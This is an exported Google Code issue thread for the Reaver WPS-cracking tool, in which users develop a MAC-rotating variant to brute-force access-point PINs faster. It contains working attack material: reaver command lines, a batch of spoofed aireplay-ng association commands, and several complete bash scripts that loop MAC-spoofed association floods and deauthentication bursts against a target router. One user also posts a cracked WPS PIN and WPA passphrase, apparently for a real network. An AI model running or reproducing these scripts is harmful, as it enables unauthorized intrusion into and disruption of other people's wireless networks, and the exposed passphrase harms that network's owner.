pizheng / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

MAC Address last character changer to speed up the attack #258

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
Please describe the feature you would like to be implemented into Reaver.
English only.

MAC Address last character changer to speed up the attack.

Well, some times the AP will reject the "EAPOL Request" after a success pin 
try. I made some tests with simultaneous reaver instances running with 
different MACs (the -m argument), and when one instance gets "WARNING: Receive 
timeout occurred", the other gets "Received identity request" and continue the 
cracking.

The problem of this method is: The reaver tool doesn't support simultaneous 
instances (ok, I read the FAQ about it). If you run two reaver instances, by 
example, the two instances will try the same pin at the same time.

I made some changes on the reaver source code. Look the output after my changes:

[+] Using MAC BC:99:47:B7:03:E9
[+] Trying pin 00485678
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Using MAC BC:99:47:B7:03:E8
[+] Trying pin 00495677
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Using MAC BC:99:47:B7:03:E7 
[+] Trying pin 00505673
...

On the first try, reaver is using the client MAC "BC:99:47:B7:03:E9" (it is not 
a real MAC, I'm just using for the example), on the second, 
"BC:99:47:B7:03:E8", on the third, "BC:99:47:B7:03:E7". Well, after the use of 
the MAC "BC:99:47:B7:03:E0", reaver will start again on "BC:99:47:B7:03:E9".

The numbers:

With this method: (13 seconds/pin)
Without this method: (31 seconds/pin)

If the development team want, I can send my modified source code.

Thanks,
Bob

Original issue reported on code.google.com by gabrielr...@gmail.com on 2 Mar 2012 at 4:36

GoogleCodeExporter commented 9 years ago
Would be a nice improvement - every pin/different mac. 

Original comment by music.an...@gmail.com on 2 Mar 2012 at 7:04

GoogleCodeExporter commented 9 years ago
Great! Can you share your modified source code Bob?

Original comment by itmanvn on 3 Mar 2012 at 2:29

GoogleCodeExporter commented 9 years ago
Yes, of course.

Reaver WPS 1.4 with MAC Changer - LINK - 
http://www.4shared.com/archive/AHxJ4rDm/reaver-14-mac-changertar.html

Example of use:

reaver -i mon0 -b AA:BB:CC:DD:EE:FF -M
or
reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer

What I recommend:

reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer --no-nacks --win7 
--no-associate -vv

To associate more effectively, I recommend to use aireplay-ng tool. Create a 
"associate.sh" file, and put this inside:

aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:ZF  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:ZE  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:ZD  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:ZC  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:ZB  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:ZA  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:Z9  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:Z8  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:Z7  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:Z6  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:Z5  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:Z4  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:Z3  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:Z2  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:Z1  &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h 
ZZ:ZZ:ZZ:ZZ:ZZ:Z0  &

PS: Change AA:BB:CC:DD:EE:FF to the BSSID and ZZ:ZZ:ZZ:ZZ:ZZ:Z to your MAC 
(without the last digit).

Before using reaver tool, just type "sh associate.sh". To kill all the 
aireplay-ng, type "killall aireplay-ng".

If you have success using this method, please, share with us to improve more 
and more the reaver WPS.

Thanks,
Bob

Original comment by gabrielr...@gmail.com on 5 Mar 2012 at 3:11

GoogleCodeExporter commented 9 years ago
I still dont understand. Like the author said. The wifi ususally doenst block 
your MAC addess, it does not have the mac address table. I mean for regular 
wifi. But what it is, is it lock WPS instead...Please someone clarify on this 

Original comment by ryanl33x...@ymail.com on 5 Mar 2012 at 5:17

GoogleCodeExporter commented 9 years ago
Well, I don't know why or how the AP rejects the "EAPOL Request", but, with the 
method I suggested, I retrieved the PIN from some APs with a better speed than 
the normal. My intention from sharing the code is to 
allow other people to try with other APs and confirm if this method works or 
not.

In my case, when reaver got a succesful pin try, some APs rejects the "EAPOL 
Request" for some seconds, but, only for the MAC who tried. It isn't a WPS 
lock, because I can continue trying PINs. I got this behavior with TP-LINK and 
D-Link APs.

Original comment by gabrielr...@gmail.com on 5 Mar 2012 at 2:53

GoogleCodeExporter commented 9 years ago
Hi Bob,

Tried your method but no luck, I use Alfa AWUS036H and AP is a Linksys

[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred

The only way still work with this AP is:

1. aireplay-ng -1 10 -a 00:23:69:XX:XX:XX -e Hitech mon3 --ignore-negative-one
2. reaver -A -b 00:23:69:XX:XX:XX -c 6 -vv -i mon3 --dh-small --no-nacks 
--ignore-locks --win7 -d 25

But this too slow :(

Original comment by itmanvn on 5 Mar 2012 at 4:08

GoogleCodeExporter commented 9 years ago
Hello,

ryanl33x1511: I found the answer! Some APs deauthenticates the client who tried 
a pin. With the MAC Changer method, when one MAC is deauthenticated (and the 
aireplay-ng take a time to authenticate), another is trying a new pin.

itmanvn: Are you using the aireplay-ng to authenticate all the MACs? Like the 
associate.sh that I suggested. And you have to check if your wireless card 
supports the injection of packets of differents MACs than yours original.

Regards,
Bob

Original comment by gabrielr...@gmail.com on 8 Mar 2012 at 3:17

GoogleCodeExporter commented 9 years ago
Hi Bob,

It was my mistake, I put wrong AP's MAC :)). Just hacked a Dlink AP. The 
Linksys still not improve speed with mac-changer.

[+] 100.00% complete @ 2012-03-07 17:24:41 (8 seconds/pin)
[+] Pin cracked in 34667 seconds
[+] WPS PIN: '32456394'
[+] WPA PSK: 'vnxkthuy'
[+] AP SSID: 'VanHung_Network'

Anyway, with --mac-changer, reaver can not crack the WPA PSK, it's just show 
WPS PIN, I have to remove --mac-changer then using -pin to get WPA PSK

Original comment by itmanvn on 8 Mar 2012 at 4:46

GoogleCodeExporter commented 9 years ago
Hi,

It seems that using the --mac-changer method took me some time compared to the 
normal -d 0 -t 1 method that i used.

--mac-changer: [+] 45.02% complete @ 2012-03-28 03:23:18 (39 seconds/pin)
-d 0 -t 1: [+] 45.06% complete @ 2012-03-28 03:24:40 (1 seconds/pin)

But it seems that the aireplay arguments helped.

Just my 1c.

Original comment by syakir on 27 Mar 2012 at 7:25

GoogleCodeExporter commented 9 years ago
aare there any chance you could reupload the reaver 1.4 with mac changer has 
the link seems to be dead

Original comment by mighty-s...@hotmail.co.uk on 8 Apr 2012 at 9:05

GoogleCodeExporter commented 9 years ago
Hi mighty,

The 4shared link is working, but I uploaded to hotfile for you:

https://hotfile.com/dl/152186405/f53e87e/reaver-1.4-mac-changer.tar.gz.html

Regards,
Bob

Original comment by gabrielr...@gmail.com on 9 Apr 2012 at 2:27

GoogleCodeExporter commented 9 years ago
i get The file link that you requested is not valid. on 4shared also just 
downloaded the hotfile one and it says its corrupt

Original comment by mighty-s...@hotmail.co.uk on 9 Apr 2012 at 5:47

GoogleCodeExporter commented 9 years ago
nevermind redownloaded and all working fine thank you

Original comment by mighty-s...@hotmail.co.uk on 9 Apr 2012 at 5:54

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
im running bt5r2 x86 desktop updated using the modified reaver 1.4 with mac 
changer.

ok this was tricky for me with wusb600n v2 (RT3572)

you still have to use the "-m" option along with the NEW "-M"
the -m needs to be the same as what is set with 'ifconfig wlan0 hw ether' for me

everything working good with the mac changer addon.
thanks

Original comment by tdbo...@gmail.com on 29 Apr 2012 at 5:05

GoogleCodeExporter commented 9 years ago
Hello,

Thank you "tdbone1" for sharing your experience, you are right, to use other 
MAC you need the "-m" option, sorry for I haven't specified it before.

Regards,
Bob

Original comment by gabrielr...@gmail.com on 30 Apr 2012 at 12:24

GoogleCodeExporter commented 9 years ago
would this help for "warning ap rate limiting"? if so it would be nice to be 
able to change mac when rate limiting does occur. the ap I'm experimenting with 
accepts +-30 pins and then I have to wait 301 seconds before I can continue the 
attack. I'll try reaver on a different machine/mac when the target ap is in 
rate limiting (because of attack with machine 1). 

peace

Original comment by kasperka...@gmail.com on 9 Jun 2012 at 8:55

GoogleCodeExporter commented 9 years ago
ok I did the test and changing the mac address won't help if the ap is blocked 
due to rate limiting.

peace

Original comment by kasperka...@gmail.com on 9 Jun 2012 at 9:47

GoogleCodeExporter commented 9 years ago
I suggest you read the Musket Team 361 entry concerning MAC codes and reaver. 
There are numerous comments on the web concerning reaver locked on the first 
pin and going no where. The 361 comments solve this but since this deals with 
mac coes we thought you might be interested. We have ONLY been playing with 
this attack for 48 hours so we were focused on just getting the program to give 
us a result. Your variable mac code approach though is intriguing. We are so 
new to this program that we do not want to comment further. We were going to 
try mac spoofing an associated client to see how this increased the results. 
Maybe you will get there before us.
  Bring What Is Hidden Into View
  Musket Team A(a group of hackers and remote viewers) 

Original comment by muske...@yahoo.com on 30 Jul 2012 at 4:13

GoogleCodeExporter commented 9 years ago
#!/bin/sh
# !!!!!   Script runs in continous loop TO STOP THIS SCRIPT open a new terminal 
window and type killall aireplay-ng    !!!!
#                          Script designed to be run during a reaver attack
# For historical reference previous scripts sending variable macs seemed to 
flood the router with association requests
# slowing down the routers ability respond during a reaver attack
# This script allows the user to set transmission rates and only send one(1) 
mac code at a time.
# The script is designed for use with Backtrack5(BT5). 
# For BT5 users, copy the file to the  /usr/bin/ folder and type 
variablemacs.sh in a terminal window. 
# This script file sends a constantly changing MAC Code to the target AP during
# a reaver attack. You can alter the time,transmission rate and seconds to 
reauth by changing the variable
# You can run wash then reaver and open airodump-ng on the same channel as 
reaver the run variablemacs.sh
# 
#                          Before you start the program  
# Change Target MAC variable within "" to your Target AP and then save the 
variablemacs.sh file to the /usr/bin folder
# Make sure the red "" remains around your mac variable entry
# And Again remember to save to the /usr/bin folder after changes are made.
# If you mess up the variables list a copy as comments can be found below
######################################################################
# TARGET="00:1F:5B:8A:47:48" = Arouter, 00:26:75:3E:DD:6C = Brouter 
# VARMAC="00:11:22:33:44:5" # Do not alter this unless you understand the 
program logic
# MON="mon0"  Can be changed if you virtual moniter is different
# TIME="120" #Seconds to reauthenticate
# TRATE="150" # Transmission rate
# DELAY="1m"  # Time process active 30s 1m 2m etc 
# The # = REM or remarks or comments. The Computer ignores this
####################################################################### 
# Below are script the variables
#
TARGET="00:26:75:3E:DD:6C" # Change the mac code to your target!!!!!!!!
VARMAC="00:11:22:33:44:5"  # Do not change unless you understand the coding 
logic
MON="mon0" # Do not change thisunless your virtual moniter is not designated as 
mon0
TIME="120" # Seconds to reauthenticate
TRATE="150" # Transmission rate
DELAY="1m"  # Time process active 30s 1m 2m etc
# Note below the 00:11:22:33:44:55 mac has been turned off as it is the same 
mac we are using with reaver 1.4
#
for (( ; ;))
do
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"0"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"0" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"1"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"1" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"2"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"2" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"3"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"3" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"4"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"4" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
# echo X
# echo XXXXXXXXXXXXXXXXXXX
# echo STARTING $VARMAC"5"
# echo XXXXXXXXXXXXXXXXXXX
# Remarked out as this is the mac used by reaver
# aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"5" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"6"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"6" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"7"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"7" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"8"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"8" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"9"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"9" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"A"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"A" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"B"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"B" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"C"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"C" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"D"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"D" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"E"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"E" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"F"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"F" --ignore-negative-one 
$MON & sleep $DELAY; kill $!
done

Original comment by muske...@yahoo.com on 31 Jul 2012 at 8:36

GoogleCodeExporter commented 9 years ago
Hello Musket Team A,

Thank you for the script, it will be useful for everybody. 

I used my method of attack during 2 months, and the results are very good. Some 
people have talked about the rate limiting, but this attack is not to bypass 
the rate limiting, this attack is to bypass the delay that the aireplay-ng 
needs to re-authenticate a MAC that tried a PIN. While the aireplay-ng 
re-authenticates the MAC, the reaver-wps is using another MAC to try another 
PIN.

Please, tell us if you find another results and thank you again for the script.

Regards,
Bob

Original comment by gabrielr...@gmail.com on 31 Jul 2012 at 7:49

GoogleCodeExporter commented 9 years ago
We have found a small bug in the program. Once started the program runs 
constantly in the background regardless of the killall aireplay-ng command. We 
are still testing this approach. We are exploring spoofing an associated 
clients mac and mixed short deauth signals embedded in this mac changing 
program running contiuously. When the signal is weak the router seems to get 
confused and only a reaver program restart sometimes and/or a short deauth 
burst like aireplay-ng -0 10 a. target AP mon0  seems to straighten things out 
and get the program moving again.
   Please note we are field testers working with these tools in the real world and are not trying to redo the fantastic work of the authors of reaver to whom we hold in high regard.

Musket Team Alpha

Original comment by muske...@yahoo.com on 1 Aug 2012 at 1:00

GoogleCodeExporter commented 9 years ago
#!/bin/sh
#                          Bash Script sends variable mac codes and embedded 
deauth to target
#                                  Script designed to be run during a reaver 
attack
# !!!!!   Script runs in a loop TO STOP THIS SCRIPT open a new terminal window 
and type killall aireplay-ng    !!!!
#
# Use this program to unstick routers when EAPOL warning messages or reception 
timeouts occur randomly during attack
# Manny times a stalled reaver attack begins to function the moment the first 
deauth in the loop is sent.
# This script allows the user to set transmission rates and only send one(1) 
mac code at a time.
# The script is designed for use with Backtrack5(BT5). 
# For BT5 users, copy the file to the  /usr/bin/ folder and type 
variablemacs01.sh in a terminal window. 
# You can alter the time,transmission rate and seconds to reauth, number of 
deauths and number of loops by changing the variable
# You can run wash then reaver and open airodump-ng on the same channel as 
reaver the run variablemacs.sh
# Make sure when running airodump-ng that you run it with the channel -c 
command set to the same channel as reaver
# If a mistake is made stop reaver, stop airodump-ng and then restart reaver 
etc.
#
#Setup before starting  
# Change Target MAC variable within "" to your Target AP and then save the 
variablemacs01.sh file to the /usr/bin folder
# Make sure the red "" remains around your mac variable entry
# And Again remember to save to the /usr/bin folder after changes are made.
# If you mess up the variables list a copy as comments can be found below
######################################################################
# TARGET="00:1F:5B:8A:47:48" 
# VARMAC="00:11:22:33:44:5" # Do not alter this unless you understand the 
program logic
# MON="mon0"  Can be changed if your virtual moniter is different
# TIME="120" # Seconds to reauthenticate
# TRATE="150" # Transmission rate
# DELAY="1m"  # Time process active 30s 1m 2m etc 
# DEAUTH="20" # Number of Deauths
# COUNT="5" # Set number of loops required. Note with the following variables 
set one(1) loop = approx 5 minutes
# The # = REM or remarks or comments. The Computer ignores echo X
# 
####################################################################### 
# Below are the script variables
#
TARGET="00:26:75:41:49:6C" # Change the mac code to your target!!!!!!!!
VARMAC="00:11:22:33:44:5"  # Do not change unless you understand the coding 
logic
MON="mon0" # Do not change thisunless your virtual moniter is not designated as 
mon0
TIME="120" # Seconds to reauthenticate
TRATE="150" # Transmission rate
DELAY="1m"  # Time process active 30s 1m 2m etc
DEAUTH="20" # Number of Deauths - we currently use 20 as 30 was too long and 10 
to short for the routers we attack
COUNT="25" # Number of loops required. Note with the following variables set 
one(1) loop = approx 5 minutes
#
while  [ $COUNT -gt 0 ]; do
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"0"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"0" --ignore-negative-one 
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"1"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"1" --ignore-negative-one 
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"2"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"2" --ignore-negative-one 
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"3"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"3" --ignore-negative-one 
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $DEAUTH'deauths'
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -0 $DEAUTH -a $TARGET $MON & sleep $DELAY; killall aireplay-ng
echo XXXXXXXXXXXXXXXXXXXXXXXXX
echo Value of count is: $COUNT
echo XXXXXXXXXXXXXXXXXXXXXXXXX
echo XXXXXXXXXXXXXX END OF LOOP XXXXXXXXXXXXXX
let COUNT=COUNT-1
done

Original comment by muske...@yahoo.com on 1 Aug 2012 at 6:13

GoogleCodeExporter commented 9 years ago
variablemac01.sh update
Allows users to run program and input mac code of target from terminal window.

#!/bin/sh
#                          Bash Script sends variable mac codes and embedded 
deauth to target
#                                  Script designed to be run during a reaver 
attack
# !!!!!   Script runs in a loop TO STOP THIS SCRIPT open a new terminal window 
and type killall aireplay-ng    !!!!
#
# Use this program to unstick routers when EAPOL warning messages or reception 
timeouts occur randomly during attack
# Manny times a stalled reaver attack begins to function the moment the first 
deauth in the loop is sent.
# This script allows the user to set transmission rates and only send one(1) 
mac code at a time.
# The script is designed for use with Backtrack5(BT5). 
# For BT5 users, copy the file to the  /usr/bin/ folder and type 
variablemacs01.sh in a terminal window. 
# You can alter the time,transmission rate and seconds to reauth, number of 
deauths and number of loops by changing the variable
# You can run wash then reaver and open airodump-ng on the same channel as 
reaver the run variablemacs.sh
# Make sure when running airodump-ng that you run it with the channel -c 
command set to the same channel as reaver
# If a mistake is made stop reaver, stop airodump-ng and then restart reaver 
etc.
#
#
######################################################################
# TARGET="00:1F:5B:8A:47:48" Note enetered by keyboard commands
# VARMAC="00:11:22:33:44:5" # Do not alter this unless you understand the 
program logic
# MON="mon0"  Can be changed if your virtual moniter is different
# TIME="120" # Seconds to reauthenticate
# TRATE="150" # Transmission rate
# DELAY="1m"  # Time process active 30s 1m 2m etc 
# DEAUTH="20" # Number of Deauths
# COUNT="5" # Set number of loops required. Note with the following variables 
set one(1) loop = approx 5 minutes
# The # = REM or remarks or comments. The Computer ignores echo X
# 
####################################################################### 
# Below are the script variables
# Keyboard Entry Target AP MAC Entry
#
while true

do
echo ''
echo '     Bash Script sends variable mac codes and embedded deauth to target'
echo '            Script designed to be run during a reaver attack'
echo '     Other variables such as number of loops must be set in script file'
echo '     =================================================================='
echo ''
echo '             !!!!!Before continuing complete the following!!!!!'
echo ''
echo '     STOP wash and START reaver on the appropriate channel'
echo '          of Target AP in a separate terminal window'
echo ''
echo '     Start airodump-ng in seperate terminal window'
echo ''
echo '     Example =  airodump-ng -c channel of target AP  mon0'
echo ''
echo '     !!Channel in reaver must equal = channel in airodump-ng!!'
echo '                    !!or reaver will fail!!'
echo '                    ========================'
echo ''

  echo -n "Please confirm Press y to continue..Press n to abort!!..Press any other key to try again:"

  read CONFIRM
  case $CONFIRM in
    y|Y|YES|yes|Yes) break ;;
    n|N|no|NO|No)
      echo Aborting - you entered $CONFIRM
      exit
      ;;

  esac
done
echo You entered $CONFIRM.  Continuing ...

while true

do
echo ''
echo ''
echo ''
echo -n "Enter your targets mac code >"

read TARGET
echo "You entered: $TARGET"

  echo -n "Please confirm Press y to continue..Press n to abort!!..Press any other key to try again:"
  echo ''
  read CONFIRM
  case $CONFIRM in
    y|Y|YES|yes|Yes) break ;;
    n|N|no|NO|No)
      echo Aborting - you entered $CONFIRM
      exit
      ;;
  esac
done
echo You entered $CONFIRM.  Continuing ...

#TARGET="20:AA:4B:A7:FD:87" # Change the mac code to your target entered by 
keyboard commands!!!!!!!!
VARMAC="00:11:22:33:44:5"  # Do not change unless you understand the coding 
logic
MON="mon0" # Do not change thisunless your virtual moniter is not designated as 
mon0
TIME="120" # Seconds to reauthenticate
TRATE="150" # Transmission rate
DELAY="1m"  # Time process active 30s 1m 2m etc
DEAUTH="20" # Number of Deauths - we currently use 20 as 30 was too long and 10 
to short for the routers we attack
COUNT="100" # Number of loops required. Note with the following variables set 
one(1) loop = approx 5 minutes
#
while  [ $COUNT -gt 0 ]; do
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"0"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"0" --ignore-negative-one 
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"1"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"1" --ignore-negative-one 
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"2"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"2" --ignore-negative-one 
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"3"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"3" --ignore-negative-one 
$MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $DEAUTH'deauths'
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -0 $DEAUTH -a $TARGET $MON & sleep $DELAY; killall aireplay-ng
echo XXXXXXXXXXXXXXXXXXX
echo Number of loops remaining =: $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo XXXXXXXXXXXXXX END OF LOOP XXXXXXXXXXXXXX
let COUNT=COUNT-1
done

Original comment by muske...@yahoo.com on 7 Aug 2012 at 7:29

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
upload to mediafire   

http://www.mediafire.com/?sptpfv9kgnof0nr

Original comment by rasimc...@gmail.com on 2 Jul 2013 at 7:54

GoogleCodeExporter commented 9 years ago
Can you help about installation

Original comment by rasimc...@gmail.com on 2 Jul 2013 at 7:58

GoogleCodeExporter commented 9 years ago
Extract the tarball

    tar -xzvf reaver-1.4-mac-changer.tar.gz

Install Required Libraries and Tools

    sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

Build Reaver

    cd reaver-1.4-mac-changer
    cd src
    ./configure
    make

Install Reaver

    sudo make install

Original comment by gabrielr...@gmail.com on 2 Jul 2013 at 5:01

GoogleCodeExporter commented 9 years ago
thanks

Original comment by rasimc...@gmail.com on 4 Jul 2013 at 6:58

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Now you can grab the code via Github: 
https://github.com/gabrielrcouto/reaver-wps

Original comment by gabrielr...@gmail.com on 24 Mar 2014 at 2:53

GoogleCodeExporter commented 9 years ago
Hi Bob, is there any new update on your code? ;)

Original comment by itmanvn on 26 Mar 2014 at 7:35

GoogleCodeExporter commented 9 years ago
Hi itmanvn,

Unfortunately not :-(

Do you have any idea that I can implement? 

Original comment by gabrielr...@gmail.com on 26 Mar 2014 at 5:48

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Can you improve this to generate random mac every 5(or something like this) 
attempts? This would be really helpful against "AP Rate Limiting". I mean 
really new MAC, not only last digit.

Original comment by Xas...@gmail.com on 3 Apr 2014 at 7:07

GoogleCodeExporter commented 9 years ago
pls give me the reaver-14-mac-changertar your both link are not working
